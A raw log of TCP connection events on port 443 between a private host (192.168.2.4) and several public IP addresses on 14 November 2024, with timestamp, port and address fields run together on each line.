                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.289855003 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.289949894 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.318770885 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.318800926 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.320517063 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.320523024 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.320565939 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.320580006 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.323321104 CET44349760192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.334101915 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.334161997 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.345005035 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.345305920 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.345366001 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.346374035 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.346622944 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.346765995 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.346837997 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.347013950 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.347028971 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.365061045 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.365319967 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.380459070 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.395729065 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.400602102 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.400670052 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.400813103 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.401047945 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.402262926 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.402281046 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.405052900 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.405251026 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.405424118 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.407881975 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.407888889 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.411904097 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.412343025 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.412344933 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.412374973 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.412455082 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.412456036 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.412466049 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.412477016 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.412549973 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.414262056 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.414283037 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.415230989 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.415265083 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.415462017 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.415462971 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.415503025 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.415662050 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.415663004 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.415683985 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.415818930 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.415842056 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.418260098 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.418272018 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.418833017 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.418873072 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.418971062 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.419106007 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.419380903 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.419415951 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.419513941 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.420757055 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.420767069 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.420794964 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.420820951 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.444612980 CET44349760192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.444633961 CET44349760192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.445293903 CET49760443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.445327997 CET44349760192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.447252035 CET44349760192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.449707031 CET49760443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.449714899 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.449757099 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.454271078 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.454313040 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.498393059 CET49760443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.498414040 CET44349760192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.509057045 CET49767443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.509092093 CET44349767192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.509180069 CET49767443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.509557009 CET49767443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.509569883 CET44349767192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.540110111 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.540162086 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.542332888 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.549022913 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.549041986 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.555231094 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.562264919 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.562275887 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.563724041 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.563776016 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.575609922 CET44349758152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.575638056 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.575730085 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.575927973 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.575941086 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.576339006 CET49758443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.576371908 CET44349758152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.578054905 CET44349758152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.578154087 CET49758443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.584534883 CET49758443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.584641933 CET44349758152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.586275101 CET49758443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.591639996 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.619828939 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.627331018 CET44349758152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.632282972 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.632389069 CET49758443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.632448912 CET44349758152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.674289942 CET49758443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.708929062 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.708942890 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.708983898 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.709018946 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.709038019 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.709038973 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.709063053 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.709079027 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.709106922 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.709106922 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.709153891 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.711390972 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.711399078 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.711433887 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.711466074 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.711476088 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.711498976 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.714262009 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.805193901 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.812135935 CET44349758152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.812230110 CET44349758152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.812309980 CET44349758152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.818270922 CET49758443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.825810909 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.825876951 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.825926065 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.825987101 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.826033115 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.826174021 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.826210022 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.827043056 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.850265980 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.924029112 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.924040079 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.924058914 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.924067974 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.924087048 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.924122095 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.924139977 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.924170017 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.925270081 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.925306082 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.925312042 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.925335884 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.925362110 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.930259943 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.071084023 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.071135044 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.083236933 CET49758443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.083268881 CET44349758152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.084470034 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.084491014 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.142560959 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.149076939 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.156624079 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.186001062 CET44349767192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.186237097 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.188935041 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.192269087 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.203885078 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.210057974 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.210077047 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.210522890 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.210550070 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.210784912 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.210804939 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.211040020 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.211054087 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.211344004 CET49767443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.211359024 CET44349767192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.212469101 CET44349767192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.212568998 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.212620974 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.213032961 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.213099003 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.213825941 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.213910103 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.214400053 CET49767443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.214571953 CET44349767192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.214597940 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.214675903 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.215239048 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.215244055 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.215327978 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.215461016 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.225735903 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.225939989 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.226558924 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.226753950 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.226764917 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.226763964 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.226950884 CET49767443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.227222919 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.227231026 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.227370024 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.227386951 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.227425098 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.227449894 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.267323971 CET44349767192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.268013000 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.268134117 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.268134117 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.268167973 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.314625025 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.350028992 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.350090981 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.350222111 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.351347923 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.351416111 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.351574898 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.352756023 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.352791071 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.352838039 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.352840900 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.352884054 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.353669882 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.353724957 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.353789091 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.353852034 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.354114056 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.354175091 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.355434895 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.355443001 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.356542110 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.356549978 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.356595993 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.368967056 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.369024992 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.369334936 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.369338989 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.384902954 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.384926081 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.385530949 CET49764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.385551929 CET4434976413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.386394978 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.386424065 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.387294054 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.387356043 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.389169931 CET44349767192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.389197111 CET44349767192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.389236927 CET49767443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.389250994 CET44349767192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.389266014 CET44349767192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.389301062 CET49767443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.413393021 CET49767443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.413408995 CET44349767192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.423650026 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.503400087 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.503834963 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.503916979 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.567744017 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.567761898 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.649856091 CET49771443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.649898052 CET44349771152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.649955034 CET49771443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.650324106 CET49771443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.650345087 CET44349771152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:47.880763054 CET44349771152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:47.882597923 CET49771443192.168.2.4152.199.21.175
